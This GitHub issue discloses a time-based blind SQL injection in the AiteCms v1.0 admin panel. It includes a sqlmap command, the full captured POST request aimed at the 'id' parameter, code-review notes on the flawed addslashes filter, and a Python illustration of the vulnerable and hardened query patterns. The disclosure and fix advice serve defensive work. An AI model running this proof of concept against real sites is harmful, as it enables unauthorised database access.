
AiteCms system background - SQL injection vulnerability #3

Open
kk98kk0 opened this issue Mar 20, 2019 · 0 comments
kk98kk0 commented Mar 20, 2019

Vulnerability description
Test object:

  1. website name: AiteCms v1.0
  2. web: http://www.aitecms.com/
  3. download link: https://pan.baidu.com/s/1qYhUu4G
  4. version: aitecms v1.0.rar archive, extracted

Test time:
March 17, 2019

Description of vulnerability:
AiteCms system background - SQL injection vulnerability. SQL injection in the background management center, under Online Message > Remarks.

Parameter: MULTIPART id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind

POC and verification
Local setup environment:
AiteCms installation guide: http://www.aitecms.com/view-4-1.html

  1. Download https://pan.baidu.com/s/1qYhUu4G
  2. Log in to the background at http://127.0.0.1/aitecms/login/; the credentials are admin/admin
  3. Verify with the POC verification method below.

Bug:

Parameter: MULTIPART id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind

Verification method:
sqlmap.py -l aitecmsSQLi.txt --batch --random-agent -o --dbms="mysql" -p id -v 4

aitecmsSQLi.txt:

POST /aitecms/login/diy_list.php?action=edit&diyid=1&id=24&do=2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/aitecms/login/diy_list.php?action=edit&diyid=1&id=24
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 1192
Connection: close
Cookie: PHPSESSID=00gdhl9buleop09vajrd4lgkk4; DedeUserID=1; DedeUserID__ckMd5=21e5482050dff3e8; DedeLoginTime=1552802338; DedeLoginTime__ckMd5=d7359ea71f3d0bb2; lastCid=1; lastCid__ckMd5=21e5482050dff3e8; ENV_GOBACK_URL=%2Faitecms%2Flogin%2Fdiy_main.php
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="dopost"

edit
-----------------------------293582696224464
Content-Disposition: form-data; name="id"

24
-----------------------------293582696224464
Content-Disposition: form-data; name="username"

林先生
-----------------------------293582696224464
Content-Disposition: form-data; name="telephone"

18978811188
-----------------------------293582696224464
Content-Disposition: form-data; name="email"

admin@tttt58.com
-----------------------------293582696224464
Content-Disposition: form-data; name="remark"

暂无备注
-----------------------------293582696224464
Content-Disposition: form-data; name="shijian"

1488250285
-----------------------------293582696224464
Content-Disposition: form-data; name="reeee"

reeeeffffffff
-----------------------------293582696224464
Content-Disposition: form-data; name="dede_fields"

username,text;telephone,text;email,text;remark,text;shijian,datetime;reeee,text
-----------------------------293582696224464
Content-Disposition: form-data; name="Submit1"

保存更改
-----------------------------293582696224464--

Vulnerability proof:
(screenshot 1)
(screenshot 2)

Reinforcement proposal:
Improve the filter function.

Code review:
Local build environment.
\aitecms\include\common.inc.php: the CheckRequest filter function at line 88 checks the submitted content, but imperfectly.
(screenshot 3)
CheckRequest is called to check $_REQUEST.
(screenshot 4)
The _RunMagicQuotes checks and the addslashes function checks are bypassed.
(screenshot 5)

Database connection: \wamp\www\aitecms\include\common.inc.php
(screenshot 6)
\wamp\www\aitecms\include\dedesql.class.php
(screenshot 7)
The SQL security checks are bypassed.
(screenshot 8)
Finally, the edit is submitted successfully.
(screenshot 9)
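The review above attributes the bug to an escape-then-concatenate filter (addslashes via _RunMagicQuotes) that cannot protect an unquoted numeric parameter such as the multipart `id`, which is exactly the context the AND time-based finding exploits. The following is an added, stand-alone illustration written for this issue, not code from the AiteCms project: it emulates the vulnerable pattern and the proposed fix against a constructed SQLite table (standing in for MySQL), with an integer check plus a parameterized query as the hardened form.

```python
import re
import sqlite3


def addslashes(value: str) -> str:
    """Emulate PHP addslashes(): backslash-escape quotes, backslashes and NUL.
    It only matters inside quoted string literals; a bare numeric value is untouched."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", value)


def setup_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the CMS 'online message' records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, username TEXT, remark TEXT)")
    conn.executemany(
        "INSERT INTO messages VALUES (?, ?, ?)",
        [(23, "alice", "first"), (24, "bob", "second"), (25, "carol", "third")],
    )
    conn.commit()
    return conn


def vulnerable_update(conn, id_value: str, remark: str) -> int:
    """Escape-then-concatenate, as a magic-quotes style filter does.
    The id is interpolated without quotes, so escaping quotes cannot constrain it.
    (MySQL reads backslash escapes; this SQLite stand-in does not, so keep remark quote-free.)"""
    sql = (
        f"UPDATE messages SET remark='{addslashes(remark)}' "
        f"WHERE id={addslashes(id_value)}"
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def hardened_update(conn, id_value: str, remark: str) -> int:
    """Reject anything that is not a plain integer id, then bind both values as parameters."""
    if not re.fullmatch(r"\d{1,10}", id_value):
        raise ValueError("id must be a positive integer")
    cur = conn.execute("UPDATE messages SET remark=? WHERE id=?", (remark, int(id_value)))
    conn.commit()
    return cur.rowcount


def remarks(conn) -> dict:
    """Current remark per id, for checking what a request actually changed."""
    return dict(conn.execute("SELECT id, remark FROM messages ORDER BY id"))
```

The vulnerable path executes an `id` of the form `24 AND <condition>` unchanged, so the row count follows the attacker's condition, which is the signal blind injection relies on; the hardened path refuses it before any SQL is built.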
